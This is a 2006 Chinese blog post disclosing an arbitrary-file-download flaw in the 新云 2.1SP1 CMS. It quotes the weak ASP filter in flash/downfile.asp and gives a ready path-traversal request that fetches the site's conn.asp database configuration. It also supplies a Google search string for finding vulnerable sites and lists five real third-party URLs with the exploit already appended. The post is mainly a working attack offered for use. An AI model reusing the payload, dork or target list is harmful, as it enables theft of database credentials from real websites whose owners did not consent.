数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

新云2.1SP1漏洞
樱木花盗 发表于 2006-11-1 1:29:13
新云2.1漏洞解析
flash/downfile.asp过滤不严导致可下载任意文件。

url = Replace(Replace(Replace(Request("url"), "'", ""), "%", ""), "\", "/")

变量URL从客户端提交的路径获取,仅过滤了"'","%"和"\"
看下面

If Len(url) > 3 Then
  If Left(url,1) = "/" Then
    Response.Redirect url
  End If
  If InStr(url,"../")<>0 Then
    Response.Redirect url
  End If
  strUrl = Left(url,10)
  If InStr(strUrl, "://") > 0 Then
    Response.Redirect url
  End If
  If InStr(url, "/") > 0 Then
    strPath = Server.MapPath(".") & "\" & url
    strPath = Replace(strPath, "/", "\")
    Call downThisFile(strPath)
  Else
    Response.Redirect url
  End If
End If
如果在URL中包含"..\"会被转换成"../",然后跳转。


fileName = split(thePath,"\")(UBound(split(thePath,"\")))
下载文件名以"\"为标记被分割。
懂点代码的都应该知道怎么利用了吧
构造利用语句提交

flash/downfile.asp?url=uploadfile/../../conn.asp

ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
举例:

http://www.ynhack.cn/flash/downfile.asp?url=uploadfile/../../conn.asp
http://www.xzws.cn/flash/downfile.asp?url=uploadfile/../../conn.asp
http://vip.hack58.com/flash/downfile.asp?url=uploadfile/../../conn.asp
http://www.52vista.com/flash/downfile.asp?url=uploadfile/../../conn.asp
http://www.173ft.com/flash/downfile.asp?url=uploadfile/../../conn.asp
以源码,软件等下载站居多。

阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.